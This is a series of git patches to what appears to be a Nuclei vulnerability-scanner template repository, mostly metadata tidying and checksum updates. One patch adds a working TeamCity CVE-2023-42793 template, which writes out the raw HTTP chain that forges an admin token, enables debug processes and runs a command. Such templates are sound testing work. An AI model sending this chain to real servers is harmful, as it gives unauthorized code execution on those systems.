-  metadata:
-    max-request: 2
-    verified: true
-    shodan-query: 'port:3310 product:"ClamAV" version:"0.99.2"'
   reference:
     - https://seclists.org/nmap-dev/2016/q2/201
     - https://bugzilla.clamav.net/show_bug.cgi?id=11585
+  metadata:
+    max-request: 1
+    shodan-query: port:3310 product:"ClamAV" version:"0.99.2"
+    verified: true
   tags: network,clamav,unauth,seclists,misconfig
 
 tcp:
diff --git a/network/misconfig/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml
index 3bd27b9528..99acb401f2 100644
--- a/network/misconfig/clickhouse-unauth.yaml
+++ b/network/misconfig/clickhouse-unauth.yaml
@@ -5,9 +5,9 @@ info:
   author: lu4nx
   severity: high
   description: ClickHouse was able to be accessed with no required authentication in place.
-  tags: network,clickhouse,unauth,misconfig
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,clickhouse,unauth,misconfig
 
 tcp:
   - inputs:
diff --git a/network/misconfig/dropbear-weakalgo.yaml b/network/misconfig/dropbear-weakalgo.yaml
index f597277415..f6a4a5d82a 100644
--- a/network/misconfig/dropbear-weakalgo.yaml
+++ b/network/misconfig/dropbear-weakalgo.yaml
@@ -6,14 +6,14 @@ info:
   severity: low
   description: |
     The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable.
-  remediation: |
-    Disable the weak algorithms.
   reference: |
     https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled
+  remediation: |
+    Disable the weak algorithms.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"Dropbear sshd"
     verified: true
-    shodan-query: 'product:"Dropbear sshd"'
   tags: network,ssh,dropbear,misconfig
 
 tcp:
diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml
index 0fd36cf4fd..7e69936ac9 100644
--- a/network/misconfig/dropbear-weakmac.yaml
+++ b/network/misconfig/dropbear-weakmac.yaml
@@ -6,14 +6,14 @@ info:
   severity: low
   description: |
     The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client.
-  remediation: |
-    Disable MD5 and 96-bit MAC algorithms.
   reference: |
     https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled
+  remediation: |
+    Disable MD5 and 96-bit MAC algorithms.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"Dropbear sshd"
     verified: true
-    shodan-query: 'product:"Dropbear sshd"'
   tags: network,ssh,dropbear,misconfig
 
 tcp:
diff --git a/network/misconfig/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml
index a7816a7dbd..db7c96a7fd 100644
--- a/network/misconfig/ganglia-xml-grid-monitor.yaml
+++ b/network/misconfig/ganglia-xml-grid-monitor.yaml
@@ -7,9 +7,9 @@ info:
   description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids.
   reference:
     - http://ganglia.info/
-  tags: ganglia,network,misconfig
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: ganglia,network,misconfig
 
 tcp:
   - inputs:
diff --git a/network/misconfig/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml
index 3d7935ea93..b7f07c666a 100644
--- a/network/misconfig/memcached-stats.yaml
+++ b/network/misconfig/memcached-stats.yaml
@@ -4,11 +4,11 @@ info:
   name: Memcached stats disclosure
   author: pdteam
   severity: low
-  tags: network,memcached,misconfig
   description: |
     Memcached stats is used to return server statistics such as PID, version, connections, etc.
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,memcached,misconfig
 
 tcp:
   - inputs:
diff --git a/network/misconfig/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml
index 1a68ce191f..4bd358db9f 100644
--- a/network/misconfig/mongodb-unauth.yaml
+++ b/network/misconfig/mongodb-unauth.yaml
@@ -10,9 +10,9 @@ info:
     - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
     - https://www.mongodb.com/features/mongodb-authentication
   remediation: Enable Authentication in MongoDB
-  tags: network,mongodb,unauth,misconfig
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,mongodb,unauth,misconfig
 
 tcp:
   - inputs:
diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml
index 83386d529c..c4f682871a 100644
--- a/network/misconfig/mysql-native-password.yaml
+++ b/network/misconfig/mysql-native-password.yaml
@@ -9,11 +9,10 @@ info:
     - https://github.com/Tinram/MySQL-Brute
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
-  tags: network,mysql,bruteforce,db,misconfig
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,mysql,bruteforce,db,misconfig
 
 tcp:
   - host:
diff --git a/network/misconfig/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml
index ee872add7f..ab28f3c96d 100644
--- a/network/misconfig/sap-router-info-leak.yaml
+++ b/network/misconfig/sap-router-info-leak.yaml
@@ -8,9 +8,9 @@ info:
   reference:
     - https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner
     - https://support.sap.com/en/tools/connectivity-tools/saprouter.html
-  tags: network,sap,misconfig
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,sap,misconfig
 
 tcp:
   - inputs:
diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml
index d131d74ee7..aeb6e69353 100644
--- a/network/misconfig/tidb-native-password.yaml
+++ b/network/misconfig/tidb-native-password.yaml
@@ -9,9 +9,9 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cwe-id: CWE-200
-  tags: network,tidb,bruteforce,db,misconfig
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,tidb,bruteforce,db,misconfig
 
 tcp:
   - host:
diff --git a/network/misconfig/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml
index 943586a9ad..d6d2a94c99 100644
--- a/network/misconfig/tidb-unauth.yaml
+++ b/network/misconfig/tidb-unauth.yaml
@@ -6,7 +6,7 @@ info:
   severity: high
   description: TiDB server was able to be accessed because no authentication was required.
   metadata:
-    max-request: 2
+    max-request: 1
     zoomeye-query: tidb +port:"4000"
   tags: network,tidb,unauth,misconfig
 
diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml
index 105301b3a5..66d07bcd01 100644
--- a/network/misconfig/unauth-psql.yaml
+++ b/network/misconfig/unauth-psql.yaml
@@ -9,7 +9,7 @@ info:
   reference:
     - https://www.postgresql.org/docs/9.6/auth-methods.html
   metadata:
-    max-request: 2
+    max-request: 1
     shodan-query: port:5432 product:"PostgreSQL"
     verified: "true"
   tags: network,postgresql,db,unauth,misconfig
diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml
index b42c2cc72b..633168c204 100644
--- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml
+++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml
@@ -10,11 +10,11 @@ info:
     - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cwe-id: CWE-77
-  tags: clockwatch,rce,network
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: clockwatch,rce,network
 
 tcp:
   - inputs:

From 4efec2d2e39edd0b2b605257bf89d3ae45a9db71 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 27 Sep 2023 19:16:20 +0530
Subject: [PATCH 0564/1090] Create shopware-installer.yaml

---
 .../installer/shopware-installer.yaml         | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 http/misconfiguration/installer/shopware-installer.yaml

diff --git a/http/misconfiguration/installer/shopware-installer.yaml b/http/misconfiguration/installer/shopware-installer.yaml
new file mode 100644
index 0000000000..fd3d73ba9e
--- /dev/null
+++ b/http/misconfiguration/installer/shopware-installer.yaml
@@ -0,0 +1,29 @@
+id: shopware-installer
+
+info:
+  name: Shopware Installer
+  author: DhiyaneshDk
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="Installation | Shopware 6"
+  tags: misconfig,shopware,install,exposure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/public/recovery/install/index.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Setup | Shopware'
+          - 'install'
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 48b9ff220519ca6dcc453003b12292cbbdd57730 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 27 Sep 2023 19:42:23 +0530
Subject: [PATCH 0565/1090] Create vironeer-installer.yaml

---
 .../installer/vironeer-installer.yaml         | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 http/misconfiguration/installer/vironeer-installer.yaml

diff --git a/http/misconfiguration/installer/vironeer-installer.yaml b/http/misconfiguration/installer/vironeer-installer.yaml
new file mode 100644
index 0000000000..a6fe9bae6d
--- /dev/null
+++ b/http/misconfiguration/installer/vironeer-installer.yaml
@@ -0,0 +1,32 @@
+id: vironeer-installer
+
+info:
+  name: Vironeer Installer
+  author: DhiyaneshDk
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: icon_hash="1315386913"
+  tags: misconfig,vironeer,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/install/information/database'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Vironeer Installer'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200

From 4afb8a05870e58d891c42476b26aad8ea792b883 Mon Sep 17 00:00:00 2001
From: sullo 
Date: Wed, 27 Sep 2023 13:08:55 -0400
Subject: [PATCH 0566/1090] This updates the order of files so that versions
 are extracted before generic Joomla! detection, fixes the regex for version
 matching, and adds a required AND matcher for the joomla.xml file.

---
 http/technologies/joomla-detect.yaml | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/http/technologies/joomla-detect.yaml b/http/technologies/joomla-detect.yaml
index e8310e013f..1f46f10728 100644
--- a/http/technologies/joomla-detect.yaml
+++ b/http/technologies/joomla-detect.yaml
@@ -5,7 +5,7 @@ info:
   author: ricardomaia
   severity: info
   description: |
-    Joomla, also spelled Joomla! (with an exclamation mark) and sometimes abbreviated as J!, is a free and open-source content management system (CMS) for publishing web content on websites.
+    Joomla! is a free and open-source content management system (CMS) for publishing content on websites.
   reference:
     - https://www.joomla.org/
     - https://github.com/joomla/joomla-cms
@@ -20,11 +20,11 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}" # >= 1.5.0 and <= 1.5.26
-      - "{{BaseURL}}/language/en-GB/en-GB.xml" # >= 1.5.0 and <= 1.5.26
       - "{{BaseURL}}/administrator/manifests/files/joomla.xml" # >= 1.6.0
+      - "{{BaseURL}}/language/en-GB/en-GB.xml" # >= 1.5.0 and <= 1.5.26
       - "{{BaseURL}}/README.txt"
       - "{{BaseURL}}/modules/custom.xml" # < 1.5.0
+      - "{{BaseURL}}" # >= 1.5.0 and <= 1.5.26
 
     stop-at-first-match: true
     host-redirects: true
@@ -44,6 +44,7 @@ http:
         regex:
           - '(?i)'
           - '(?i)Joomla_([\d.|\d]+)_version_history'
+          - 'FILES_JOOMLA_XML_DESCRIPTION'
         condition: or
 
     extractors:
@@ -51,6 +52,6 @@ http:
         name: version
         group: 1
         regex:
-          - "(?i)(.*)"
+          - '(.*?)'
           - '(?i)Joomla_([\d.|\d]+)_version_history'
         part: body

From f0ba24afa1b65fb7667a99ebc5abdd2f73021dc9 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Wed, 27 Sep 2023 23:25:18 +0530
Subject: [PATCH 0567/1090] JetBrains TeamCity - Remote Code Execution
 (CVE-2023-42793)

---
 http/cves/2023/CVE-2023-42793.yaml | 72 ++++++++++++++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-42793.yaml

diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml
new file mode 100644
index 0000000000..2bda0cca5c
--- /dev/null
+++ b/http/cves/2023/CVE-2023-42793.yaml
@@ -0,0 +1,72 @@
+id: CVE-2023-42793
+
+info:
+  name: JetBrains TeamCity - Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
+  reference:
+    - https://www.jetbrains.com/privacy-security/issues-fixed/
+    - https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis
+    - https://www.sonarsource.com/blog/teamcity-vulnerability
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-42793
+    cwe-id: CWE-288
+    epss-score: 0.00091
+    epss-percentile: 0.38288
+    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: jetbrains
+    product: teamcity
+    shodan-query: title:TeamCity
+    fofa-query: title=TeamCity
+  tags: cve,cve2023,rce,intrusive,teamcity,jetbrains
+
+http:
+  - raw:
+      - |
+        DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+      - |
+        POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Content-Type: application/x-www-form-urlencoded
+      - |
+        POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Content-Type: application/x-www-form-urlencoded
+      - |
+        POST /app/rest/debug/processes?exePath=echo¶ms={{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '
Date: Wed, 27 Sep 2023 23:35:06 +0530
Subject: [PATCH 0568/1090] Update CVE-2023-42793.yaml

---
 http/cves/2023/CVE-2023-42793.yaml | 26 ++++++++++++++++----------
 1 file changed, 16 insertions(+), 10 deletions(-)

diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml
index 2bda0cca5c..62b3c3601b 100644
--- a/http/cves/2023/CVE-2023-42793.yaml
+++ b/http/cves/2023/CVE-2023-42793.yaml
@@ -1,14 +1,16 @@
 id: CVE-2023-42793
 
 info:
-  name: JetBrains TeamCity - Remote Code Execution
+  name: JetBrains TeamCity < 2023.05.4 - Remote Code Execution
   author: iamnoooob,rootxharsh,pdresearch
   severity: critical
-  description: In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
+  description: |
+    In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
   reference:
     - https://www.jetbrains.com/privacy-security/issues-fixed/
     - https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis
     - https://www.sonarsource.com/blog/teamcity-vulnerability
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-42793
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -18,31 +20,37 @@ info:
     epss-percentile: 0.38288
     cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
   metadata:
-    vendor: jetbrains
-    product: teamcity
+    max-request: 5
+    verified: true
     shodan-query: title:TeamCity
     fofa-query: title=TeamCity
-  tags: cve,cve2023,rce,intrusive,teamcity,jetbrains
+    vendor: jetbrains
+    product: teamcity
+  tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive
 
-http:
+requests:
   - raw:
       - |
         DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
+
       - |
         POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
         Host: {{Hostname}}
+
       - |
         POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
         Host: {{Hostname}}
         Authorization: Bearer {{token}}
         Content-Type: application/x-www-form-urlencoded
+
       - |
         POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
         Host: {{Hostname}}
         Authorization: Bearer {{token}}
         Content-Type: application/x-www-form-urlencoded
+
       - |
         POST /app/rest/debug/processes?exePath=echo¶ms={{randstr}} HTTP/1.1
         Host: {{Hostname}}
@@ -58,9 +66,7 @@ http:
       - type: word
         part: body_5
         words:
-          - 'StdOut:'
-          - '{{randstr}}'
-        condition: and
+          - 'StdOut:{{randstr}}'
 
     extractors:
       - type: regex
@@ -69,4 +75,4 @@ http:
         group: 1
         regex:
           - 'value="(.*?)"'
-        internal: true
\ No newline at end of file
+        internal: true

From e616bb0ec79bb32b61cc2c6af54b32c488234a1c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 27 Sep 2023 23:35:44 +0530
Subject: [PATCH 0569/1090] protocol update

---
 http/cves/2023/CVE-2023-42793.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml
index 62b3c3601b..fb9b0fc02b 100644
--- a/http/cves/2023/CVE-2023-42793.yaml
+++ b/http/cves/2023/CVE-2023-42793.yaml
@@ -28,7 +28,7 @@ info:
     product: teamcity
   tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive
 
-requests:
+http:
   - raw:
       - |
         DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1

From a3822af631834d2b8c5fd1043726f814a900ca0a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 27 Sep 2023 18:10:21 +0000
Subject: [PATCH 0570/1090] Auto Generated New Template Addition List [Wed Sep
 27 18:10:21 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index c08a9ca12d..6e4dd107f9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-2479.yaml
 http/cves/2023/CVE-2023-2766.yaml
 http/cves/2023/CVE-2023-36845.yaml
 http/cves/2023/CVE-2023-42442.yaml
+http/cves/2023/CVE-2023-42793.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/cves/2023/CVE-2023-5074.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml

From 87e8a0963adf624a525d3cb1a1ae38f2c318db7a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 27 Sep 2023 18:10:35 +0000
Subject: [PATCH 0571/1090] Auto Generated Templates Checksum [Wed Sep 27
 18:10:35 UTC 2023] :robot:

---
 templates-checksum.txt | 185 +++++++++++++++++++++--------------------
 1 file changed, 93 insertions(+), 92 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index d83c5aa6d8..ef76637fd9 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2654,6 +2654,7 @@ http/cves/2023/CVE-2023-4173.yaml:6b300087c13e3a095031bc1a2d0f8d8590f1a6d8
 http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e
 http/cves/2023/CVE-2023-41892.yaml:e042c550adbe64454aea30c413ded1b9d7a72814
 http/cves/2023/CVE-2023-42442.yaml:c6e765cc76d6e24c920ac246e83837e68011c2fd
+http/cves/2023/CVE-2023-42793.yaml:a879cc4583f87b594db0f3f5211b2e4c2ca9c10f
 http/cves/2023/CVE-2023-4568.yaml:a40438e923a862215d522cfad6534b0fb3374249
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
 http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042
@@ -7053,90 +7054,90 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b
 http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:867377dd72eed091ea11ee05778c06855a5aef2b
 http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:68c6f8ed4ebd17880e69cb75ff46e4594f9b1274
 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:026425b2b85ab06c5db42d543763a9d6cfcc8794
-network/backdoor/backdoored-zte.yaml:f2404c7da8bc8f4a0f44c9a98c954a0b70b6a6ca
-network/backdoor/vsftpd-backdoor.yaml:be584f958ad40909f5fd12048c1c70840e5b55fd
-network/cves/2001/CVE-2001-1473.yaml:3533c4dd73e57282133423457b202f16ce6b8dac
+network/backdoor/backdoored-zte.yaml:00d57052cdcc4954f74ab6c9fd60d27ab63a8b10
+network/backdoor/vsftpd-backdoor.yaml:0c27dc630c99bb84d3b5402f458499efdacf5ba1
+network/cves/2001/CVE-2001-1473.yaml:457d709afdab0fbd7dd9f14e825f4e75fd9a8881
 network/cves/2011/CVE-2011-2523.yaml:827f6785ecdf7e6e387253450f502995bc2cf5c3
-network/cves/2015/CVE-2015-3306.yaml:55a8f518a54a533a10b30e3bd93ba1039bdb1f0e
-network/cves/2016/CVE-2016-2004.yaml:eaeffebb559fa76744fd7fd1b779b5e5521dbeb0
-network/cves/2016/CVE-2016-3510.yaml:ab649b2bd1a9eda70cb43d600b6320c45f01806e
-network/cves/2017/CVE-2017-3881.yaml:b97e5e80d981cb76446c857d349e7d3fb63bd9a9
-network/cves/2017/CVE-2017-5645.yaml:385b1455ebbddb6136054cd2886c87f50818135d
+network/cves/2015/CVE-2015-3306.yaml:e024ecae01f90905d709aa687472be03492df017
+network/cves/2016/CVE-2016-2004.yaml:2c2bde9576053bb5304d0c0b98904e83cef760fc
+network/cves/2016/CVE-2016-3510.yaml:69e2e9a79ef820144ed5f195649c202a5af556d4
+network/cves/2017/CVE-2017-3881.yaml:af612540061ff143a112c77a4941dbbd5af3afdf
+network/cves/2017/CVE-2017-5645.yaml:2991df5787f65e32faca5135964527c08b65f0e8
 network/cves/2018/CVE-2018-2628.yaml:f823ce8c5d0f0f9947a5131c6fe61f0edd98ad0d
-network/cves/2018/CVE-2018-2893.yaml:99800642b6815c2ddd46dbdac4c51206b467271e
-network/cves/2020/CVE-2020-11981.yaml:d73e69b51496835f55e58fabb67992aa6635203c
-network/cves/2020/CVE-2020-1938.yaml:887bd58e985526a366f67962db239a627e9e5181
-network/cves/2020/CVE-2020-7247.yaml:9ed3065e9ee6c3f121fe08a6117d586ff352eb8c
-network/cves/2021/CVE-2021-44521.yaml:2cc6438637f42c0e34ecc68f2459b050ededd971
-network/cves/2022/CVE-2022-0543.yaml:c9f0f01774372aae54622c97b9a68ce5997cc3b2
-network/cves/2022/CVE-2022-24706.yaml:3fcf75994b8852f37271048b9af452f602c79a95
+network/cves/2018/CVE-2018-2893.yaml:8d9ed744eabb2a47394923f8039dcce610d33477
+network/cves/2020/CVE-2020-11981.yaml:18b841c643190292324095339ab337531ebb6631
+network/cves/2020/CVE-2020-1938.yaml:9319ccf8bbbbbca7a0a968dfee4d5edfcf45f354
+network/cves/2020/CVE-2020-7247.yaml:67288a79735a29b272f5f4f6db7a3971e445fb92
+network/cves/2021/CVE-2021-44521.yaml:50c4aeda838496c74e9e3d8410ec4c9f540d969e
+network/cves/2022/CVE-2022-0543.yaml:1d5d93909ed98dce98b32d742efc7fb5c443a213
+network/cves/2022/CVE-2022-24706.yaml:0f2c4046631066ed354e4deef50025a6fdc66d0b
 network/cves/2022/CVE-2022-31793.yaml:ac870c80a1d17e215fc1357d257cdd07f2aca8da
-network/cves/2023/CVE-2023-33246.yaml:31795e9d41202a88961af586a1d947fa60d90246
-network/default-login/ftp-anonymous-login.yaml:20a6c899ab3d67d5e178c0d167d8fce637945c1a
-network/default-login/ftp-weak-credentials.yaml:40ce5a09aff1c80a461d2acebb8cb3816bda9779
-network/default-login/ldap-anonymous-login.yaml:5ceeb7c64897a0469e3b9e5a2ec925567c0a8925
-network/detection/activemq-openwire-transport-detect.yaml:a2a7d1d1be98ebc53229cce7b9a75e0aefc516b2
-network/detection/apache-activemq-detect.yaml:15b56708cf6d6f8dca783cb40b6d3f9b1ffb765d
-network/detection/axigen-mail-server-detect.yaml:658eaaf7b6ae1a881862207802800b3052d0324d
-network/detection/cisco-finger-detect.yaml:b242374a1df790541b766f4f0e36666a2a7549c5
-network/detection/clamav-detect.yaml:8616e250aa69c74ff903919b6cff28a77c4ae075
-network/detection/cql-native-transport.yaml:ccd025169c99c719b79d13cf8b72a58559321a07
-network/detection/detect-addpac-voip-gateway.yaml:86931a2b160f7ffb63386c2add91b28f91648595
-network/detection/detect-jabber-xmpp.yaml:94388107835fcf3923fb0151ff02b4b9a35d829c
-network/detection/dotnet-remoting-service-detect.yaml:ecae3ec87ce7d816448d05a5b611fcc4ce248407
-network/detection/dropbear-cbc-ciphers.yaml:896bdca3f90b65c9c6013438d67eb8c95389f6d8
-network/detection/esmtp-detect.yaml:470b3c4eecbc6946f1af9755fb0e934d91e2ab86
-network/detection/expn-mail-detect.yaml:e10d98af34370bdc982563d1878f8f558e197ecf
-network/detection/finger-detect.yaml:eab8109135becb245495b39e84f6123721586bfd
-network/detection/gnu-inetutils-ftpd-detect.yaml:c2e348774b35f11a845bcb7c2a726df335749b80
-network/detection/gopher-detect.yaml:3901b4cf94fbb3661b0aeb904a38f3f6b8194c80
-network/detection/ibm-d2b-database-server.yaml:9c219e670702e3369473a0c68fafbc8d75a87ab0
-network/detection/imap-detect.yaml:711c3da60996bbd7175b494caabb90523febbca4
-network/detection/iplanet-imap-detect.yaml:6252d0cd1de590c9de0ee8ac5bf9968d45b1234e
+network/cves/2023/CVE-2023-33246.yaml:f88cdef75dbea457d4701d28ce3618d509c3c205
+network/default-login/ftp-anonymous-login.yaml:f61a23c7255023a6094b8e7dfa64ab24a6b05693
+network/default-login/ftp-weak-credentials.yaml:ce6e6b8ab58e138e590ee61aa0a305aa36ad6fe2
+network/default-login/ldap-anonymous-login.yaml:de040a46cb1ed8184db1ff0f88d03eb2b1bc63f6
+network/detection/activemq-openwire-transport-detect.yaml:0dc9e5e360bd3b2e2a919f62e489e924ae8b82d3
+network/detection/apache-activemq-detect.yaml:121abc64adbf17327bc23a8431f3b5e08f510dfe
+network/detection/axigen-mail-server-detect.yaml:c7e5b22d9b36cb6bb48b9347aa8eec265b7214a0
+network/detection/cisco-finger-detect.yaml:770b049aa09f72d15c6bd23a04899a330eb4a256
+network/detection/clamav-detect.yaml:09433cdc329da80ee710a7e5893d8ee2cad9eb73
+network/detection/cql-native-transport.yaml:73ac12a1c9eff62746d27dccd4e776573175bf2e
+network/detection/detect-addpac-voip-gateway.yaml:17f1ead7ca456dc5ba594acf6cbba1d4fcac14dd
+network/detection/detect-jabber-xmpp.yaml:e1b45b797643fed29ade289b42847b46de8f8334
+network/detection/dotnet-remoting-service-detect.yaml:01ba3af63c4aa686648ab384f4c433b4ba56cddd
+network/detection/dropbear-cbc-ciphers.yaml:81a0b5ed84c09a9b0c55c537a5ced0743b863fcc
+network/detection/esmtp-detect.yaml:c3d33a0a2f7d15141f8a4ecd009c8e80b1d953b9
+network/detection/expn-mail-detect.yaml:0a678b4c450f8678c85c57b4ed57ff1051857a35
+network/detection/finger-detect.yaml:b30a5b0245d64477f425e1a2ba1faf0de98b4f8f
+network/detection/gnu-inetutils-ftpd-detect.yaml:f9e780d0b307d82c574456d8984803962e18bdb0
+network/detection/gopher-detect.yaml:d4db09bbea0f0c079340fb2a21b3d613297ff8c2
+network/detection/ibm-d2b-database-server.yaml:f4f5c7622cc52b427a01e33b8773ed2facfe2cab
+network/detection/imap-detect.yaml:38b7d2e767dbf7c1b104ed30eca11bed3438f618
+network/detection/iplanet-imap-detect.yaml:da0192f4b7792fd58f9fe4909a6824b754a6a4ea
 network/detection/java-rmi-detect.yaml:d724183dc184431e03ed5c8274421665c7bda989
-network/detection/microsoft-ftp-service.yaml:e50fb87b704d9e1afca92335bff43102192c4ea4
-network/detection/mikrotik-ftp-server-detect.yaml:a044ce5ddf8d1511272d3be61e2a6ac1fae65dd9
-network/detection/mikrotik-routeros-api.yaml:39f157753ce8be7239d12494e5f7b458f79cf347
-network/detection/mongodb-detect.yaml:f2d353e05a121675c34ad57d7b75888342b2fa24
-network/detection/msmq-detect.yaml:4c3895d1a669b762a75ad31aac269090c48a55bf
-network/detection/mysql-detect.yaml:e1bc919065aa2b6272dae784d33d77e0733757c8
-network/detection/openssh-detect.yaml:e4e89cbf2e5603105b2c106259ee6ed3ea5e907e
-network/detection/pgsql-detect.yaml:b71235f0e0a89752d8a6529cfb2f6df7ac4dcec7
